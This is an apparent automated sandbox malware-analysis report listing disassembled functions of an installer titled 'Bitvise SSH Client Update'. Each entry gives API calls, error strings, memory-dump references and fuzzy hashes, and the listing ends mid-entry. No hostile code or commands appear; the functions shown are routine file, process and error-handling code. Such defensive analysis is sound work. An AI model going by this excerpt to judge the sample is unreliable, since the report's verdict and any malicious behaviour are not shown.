                                                                                                                                  Function 00E3C0A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E463C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E4647E
                                                                                                                                  • SetConsoleTitleW.KERNEL32(Bitvise SSH Client Update,00000001,?,460C02D8), ref: 00E3C10A
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 00E3C113
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CommandConsoleException@8LineThrowTitle
                                                                                                                                  • String ID: %$Bitvise SSH Client Update
                                                                                                                                  • API String ID: 97332920-3733305414
                                                                                                                                  • Opcode ID: 525f6e2ac3948cfd8fbb3fe28a82d99004fab9f9c3ab87b53bd5065ec085a30e
                                                                                                                                  • Instruction ID: bd5c7a0863877b21d8154c20065f41da7bea4e625462d7a1947695ea79bea2c9
                                                                                                                                  • Opcode Fuzzy Hash: 525f6e2ac3948cfd8fbb3fe28a82d99004fab9f9c3ab87b53bd5065ec085a30e
                                                                                                                                  • Instruction Fuzzy Hash: E6615B30C05299DAEB25EB64CD59BEEBBB4AF11304F1051EAD045B3192DB741F88CFA2
                                                                                                                                  Function 00E3C7CA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C7CA
                                                                                                                                    • Part of subcall function 00E59DF0: OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                    • Part of subcall function 00E59DF0: GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                    • Part of subcall function 00E59DF0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                    • Part of subcall function 00E3B710: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3B78B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C83B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C892
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Current$Exception@8Throw$ErrorLastOpenToken
                                                                                                                                  • String ID: %
                                                                                                                                  • API String ID: 2882612034-2567322570
                                                                                                                                  • Opcode ID: 50a46f02b1fdb63e721623f7f1f467e3c9aaf75acc8883d941fbf96d482426bd
                                                                                                                                  • Instruction ID: f7a8dd58580e576f183c615758a9851ec79dc70b6ca954324cf74f7f9e181131
                                                                                                                                  • Opcode Fuzzy Hash: 50a46f02b1fdb63e721623f7f1f467e3c9aaf75acc8883d941fbf96d482426bd
                                                                                                                                  • Instruction Fuzzy Hash: 7151B331D04288CADB19EB78D9597EDBFB0AF25304F2450E9D445B7292DB30AB48CB62
                                                                                                                                  Function 00E6B510 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E6B5F7
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B601
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B645
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastThrowWrite
                                                                                                                                  • String ID: WriteFile()
                                                                                                                                  • API String ID: 3863794488-2764729538
                                                                                                                                  • Opcode ID: caa29d7f06972366b30bce0e030d12db71852aa1fb3167769c3ce0b9553ed1cd
                                                                                                                                  • Instruction ID: 5b43e30656f0d791be9deb499aa8352fdc557e3fe232283eeff53b3b2addd1e0
                                                                                                                                  • Opcode Fuzzy Hash: caa29d7f06972366b30bce0e030d12db71852aa1fb3167769c3ce0b9553ed1cd
                                                                                                                                  • Instruction Fuzzy Hash: E241AC75A00618DFCF18DF54D994AAEBBF8FF08754F004469E812AB395DB34AD49CBA0
                                                                                                                                  Function 00E6B690 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00E6B774
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00E6B77E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B7C2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastReadThrow
                                                                                                                                  • String ID: ReadFile()
                                                                                                                                  • API String ID: 359733464-1174911424
                                                                                                                                  • Opcode ID: 5972fef5c03cce910c470f1ab0d4d449b8bed10e9ed97389c038ca438819b0c0
                                                                                                                                  • Instruction ID: 02b266c48c3ccecb1ccafec12f69f61844b89458267ba5dbaea387cf5ffe3ce2
                                                                                                                                  • Opcode Fuzzy Hash: 5972fef5c03cce910c470f1ab0d4d449b8bed10e9ed97389c038ca438819b0c0
                                                                                                                                  • Instruction Fuzzy Hash: 0F415975A00219DFCF18DF64D894AAEBBB8FF08754F004569E812AB395DB34BD49CB90
                                                                                                                                  Function 00E6BD70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,?,460C02D8), ref: 00E6BE2D
                                                                                                                                  • GetLastError.KERNEL32(?,460C02D8), ref: 00E6BE48
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BE8C
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8FileLastMoveRaiseThrow
                                                                                                                                  • String ID: MoveFileExW()
                                                                                                                                  • API String ID: 1464417811-2966240118
                                                                                                                                  • Opcode ID: 4297ecdc29b367fa0d11b8a4bf0f882c98d61f85d7df261ff0db0659c99bd39c
                                                                                                                                  • Instruction ID: 644b96f63d2fbf46849677cc04c438a3e84ca33c91a15574b341c5015335146e
                                                                                                                                  • Opcode Fuzzy Hash: 4297ecdc29b367fa0d11b8a4bf0f882c98d61f85d7df261ff0db0659c99bd39c
                                                                                                                                  • Instruction Fuzzy Hash: 1D31ADB0901249EFDB14DFA5D958BEEBBF8FF04314F108169E415A7280D7796A08CFA0
                                                                                                                                  Function 00F06C00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000001,460C02D8,00000000,00000000), ref: 00F06C4F
                                                                                                                                    • Part of subcall function 00E48820: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E4885A
                                                                                                                                    • Part of subcall function 00E48820: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E48879
                                                                                                                                    • Part of subcall function 00E48820: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E48892
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00F06C6A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F06CD7
                                                                                                                                  Strings
                                                                                                                                  • ThreadObject::Setup: CreateEvent() failed - , xrefs: 00F06CA3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CloseCreateEventException@8HandleThrow
                                                                                                                                  • String ID: ThreadObject::Setup: CreateEvent() failed -
                                                                                                                                  • API String ID: 4147431150-1160059298
                                                                                                                                  • Opcode ID: 3129cfa9675f0c0f48d261d11094cc38f66b56b830ce44d166ac333465b226b4
                                                                                                                                  • Instruction ID: 823c9c9cd32413bee9f534074fb6d7180fc764fe0445c82e325a002e347a92ce
                                                                                                                                  • Opcode Fuzzy Hash: 3129cfa9675f0c0f48d261d11094cc38f66b56b830ce44d166ac333465b226b4
                                                                                                                                  • Instruction Fuzzy Hash: 9931C371A00208AFCB19EFA4DC45F9EBBB8EF48720F108569F519E72D1DB75A504CB90
                                                                                                                                  Function 01108390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F005C0: InitializeCriticalSection.KERNEL32(013199FC,?,011083F9,?,00000000), ref: 00F005C4
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0110840F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInit_thread_footerInitializeSection
                                                                                                                                  • String ID: ERROR: $Trace: $Warning:
                                                                                                                                  • API String ID: 2684443898-3985709694
                                                                                                                                  • Opcode ID: f08b8b899194baa6ba35aa9cc070a2f8ec3aeb022d80a75c028d9a0d233e8e3d
                                                                                                                                  • Instruction ID: 2ddf78ede94f9641feda136577648562ffb60f739809a8cf255e5ce5c55c7702
                                                                                                                                  • Opcode Fuzzy Hash: f08b8b899194baa6ba35aa9cc070a2f8ec3aeb022d80a75c028d9a0d233e8e3d
                                                                                                                                  • Instruction Fuzzy Hash: 78310931E44245EBCF29DF68DC52B6DB7B1EB04B28F01462DE951A72C5DBB06904CB91
                                                                                                                                  Function 00E6AC74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6AC80
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00E6ACAD
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6ACD8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8LastObjectRaiseSingleThrowWait
                                                                                                                                  • String ID: WaitForSingleObject()
                                                                                                                                  • API String ID: 4210095878-2408256805
                                                                                                                                  • Opcode ID: 12e9508544c7de09e9f93df939a7411528252833e02394a642e395de89e5e380
                                                                                                                                  • Instruction ID: 2cd63551f62c04e16383ee4cbcbe363bfd40917605fffb5a7900c2a59c5452b1
                                                                                                                                  • Opcode Fuzzy Hash: 12e9508544c7de09e9f93df939a7411528252833e02394a642e395de89e5e380
                                                                                                                                  • Instruction Fuzzy Hash: C51129313141059BC618EB28EC46B6DB7A1EF94324F004276F9259B2D0CB706C50C7D2
                                                                                                                                  Function 00E86140 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
